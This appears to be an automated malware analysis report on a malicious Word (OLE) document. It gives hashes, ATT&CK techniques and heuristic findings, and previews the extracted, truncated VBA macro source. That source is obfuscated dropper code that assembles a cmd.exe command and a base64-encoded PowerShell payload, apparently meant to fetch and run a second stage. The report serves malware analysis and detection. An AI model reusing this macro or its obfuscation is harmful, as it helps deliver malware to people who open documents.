Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 776784d0a3d71033…

MALICIOUS

Office (OLE)

73.6 KB First seen: 2018-09-04
MD5: 0438489d3e723d037bd2fa73b8eee251 SHA-1: 4758495ca6b9f858185256776fc0a352182709a8 SHA-256: 776784d0a3d7103392e5f594272c859330b4b65f676441bb40e56e9affa8283a
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro uses the Shell() function to execute a command, which is heavily obfuscated through string concatenation. The reconstructed command appears to set environment variables and then execute 'cmd.exe' with various parameters, likely to download and run a secondary payload.

Heuristics 6

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 75,370 bytes but its declared streams total only 35,461 bytes — 39,909 bytes (53%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13304 bytes
SHA-256: 73c00e40d44cc22d688cc2deb91968d09f88ba6aad21652ac6d6db5def08c06e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jjzQflwz"
Function VDwCbH()
On Error Resume Next
mRZjf = CStr(uEMzAO * Tan(XwMTia * Int(hRUWlT * Sqr(70512) / sJvdOK + Fix(32352)) / 50413 * Round(94142 / Log(95439 - EiaLW) + 99206 - OkDPW)) / 67382 + CByte(10046))
FrYWUzj = "md ZwmpJQbMjtq" + "JT zEttfW" + "juKE" + "zILlFOLQ"
aVwDv = CStr(rILCE * Tan(zhGVP * Int(QVzHG * Sqr(96230) / RFAhc + Fix(75632)) / 23425 * Round(46205 / Log(83582 - vdtCGM) + 41697 - IScUh)) / 56593 + CByte(64881))
ujPZOHwnq = "r PQiz" + "LjDjbfA &   " + "  " + "%^c^o^m^" + "S^p" + "^E^c^%     " + "%^c^o^m^S^p^E^" + "c^% " + "    /V    "
ASjYS = CStr(wjdGr * Tan(iPszHw * Int(sWTKI * Sqr(56451) / zfuzXW + Fix(371)) / 55108 * Round(74959 / Log(88032 - SShiMZ) + 98767 - uftad)) / 23601 + CByte(70632))
MifXsziGAk = "     /c " + "  " + "        set " + "%zEHBXFwz"
pdjHa = CStr(ZQTmfj * Tan(aGcwK * Int(idOJuL * Sqr(76183) / NEFQln + Fix(8978)) / 21106 * Round(98390 / Log(12038 - OXtQLZ) + 88111 - ATZQc)) / 36425 + CByte(44854))
ZrmtMbKCfO = "HpCckJH%=aafft" + "bYi" + "o&&set" + " %Ncaas" + "Jirtvqd%=p&&se" + "t %zoHsCCVGF"
obTmw = CStr(MLLOVu * Tan(PPGWMw * Int(lNDkA * Sqr(90059) / OnoczO + Fix(62535)) / 31455 * Round(68899 / Log(60874 - pbLhE) + 93641 - zUkDS)) / 89231 + CByte(30029))
oTKZPvUS = "YI%=o" + "^w&" + "&set %KwUmjB" + "SiECEDkiJ%" + "=SjnM" + "oznD&&set %iz" + "kCpaLTE%=!%" + "NcaasJirt" + "vqd%!&&set %T"
VDwCbH = FrYWUzj + ujPZOHwnq + MifXsziGAk + ZrmtMbKCfO + oTKZPvUS
End Function
Function tqwEiEHjK()
On Error Resume Next
GVaYj = CStr(BAzYXl * Tan(fPzjb * Int(XVFDI * Sqr(12168) / AaBKUt + Fix(25696)) / 52634 * Round(15233 / Log(21250 - LwhnaN) + 18002 - LfTElX)) / 83503 + CByte(84692))
PKudZpjjPt = "cJwzGVf" + "ZMM" + "JiLb%=jzjHC" + "LprWTbsl&&se" + "t %QGfZhjcu%=e" + "^r&&s" + "et %fsDCGj" + "tBEJ%=!%zo"
BARSRD = CStr(bwmDdY * Tan(YEKUfU * Int(urubvA * Sqr(63267) / QmdBU + Fix(50651)) / 14345 * Round(86834 / Log(44554 - swMcbG) + 7732 - jvAbDM)) / 45437 + CByte(16481))
OwbVUJ = "HsCCVG" + "FYI" + "%!&&set " + "%OmRSqjR" + "hafE%=s&&set " + "%VAMIQSDsWizhZ" + "iX%=zhHHzc" + "qRfB&&set %K"
IXrWD = CStr(FizZb * Tan(WQLma * Int(XXRQnX * Sqr(14892) / lVojR + Fix(58143)) / 23841 * Round(38000 / Log(97970 - fXpsG) + 89477 - jckMfp)) / 78236 + CByte(56105))
vwIsFvzESDq = "amYdXV%" + "=he&&set %fHE" + "SSbCDRLO%=ll&&" + "!%izkCpaL" + "TE%!!%" + "fsDCGjtBEJ" + "%!!%QGfZhjcu"
zkorjU = CStr(mTktQ * Tan(zqCRp * Int(DwfRX * Sqr(79896) / uXEFj + Fix(145)) / 11844 * Round(83068 / Log(58170 - fHlLID) + 48655 - BKYft)) / 19575 + CByte(26266))
ilWfiwizNkZ = "%!!%OmRSqjRhafE" + "%!!%KamYdXV%!" + "!%fHESSbCDRLO%!" + "  -e K"
hZdUTR = CStr(cZriN * Tan(tKRTP * Int(KEvvt * Sqr(11240) / WiiPdt + Fix(84909)) / 63048 * Round(35211 / Log(62140 - JINFJ) + 73382 - ULRHA)) / 14229 + CByte(22828))
ozaJt = "ABOAGUAdwA" + "tAE8" + "AYgBqAGUAQwBU" + "ACAAIABzAH" + "kAUwBUA" + "GUAT" + "QAu" + "AGkATwAuAEMAT" + "wBtAFAAc"
mDvmij = CStr(XvXtJ * Tan(oVXad * Int(JGJFu * Sqr(17403) / YtiOib + Fix(7260)) / 99010 * Round(14192 / Log(78480 - fBiukS) + 64920 - cDjqt)) / 63474 + CByte(43540))
VjjojLajdHK = "gBFAFMAcwBJAE" + "8AbgA" + "uAGQARQBmAEwA" + "YQB0A" + "GUAcw" + "B0AFIAZQ"
tqwEiEHjK = PKudZpjjPt + OwbVUJ + vwIsFvzESDq + ilWfiwizNkZ + ozaJt + VjjojLajdHK
End Function
Function wjwdpvTwjYS()
On Error Resume Next
CXcwA = CStr(zLVtht * Tan(GOjjm * Int(cZPVrX * Sqr(60456) / brDkhH + Fix(44466)) / 3164 * Round(53135 / Log(59240 - lCBSZr) + 71488 - wWozKH)) / 72711 + CByte(89234))
VchHmjj = "BB" + "AE0AK" + "ABbAEkAb" + "wAuAE0" + "ARQBtAE" + "8Acg" + "B5AH" + "MAdABSAEUAQQB"
mCkaUw = CStr(TRIzl * Tan(EmCpAs * Int(GqiGii * Sqr(20587) / stcvNr + Fix(28562)) / 49118 * Round(88304 / Log(30213 - FdzHj) + 71532 - BRCzU)) / 12809 + CByte(86247))
uSSWhGRiNIF = "NAF0AWwBzAFkAU" + "wB" + "0AGUAbQAuAGMA" + "Tw" + "BuAFYAZQ" + "ByAFQAXQA6AD"
YwYir = CStr(mlbYfE * Tan(DpMIa * Int(nwGiuV * Sqr(62672) / tkuYWC + Fix(86514)) / 36616 * Round(34742 / Log(2850 - XdTsY) + 66842 - jdwbp)) / 79935 + CByte(88936))
zzRPwOS = "oAZgBSA" + "G8AbQBCAEEA" + "cwBlADYANABzAHQ" + "AcgBJAE4ARwAoAC" + "c
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.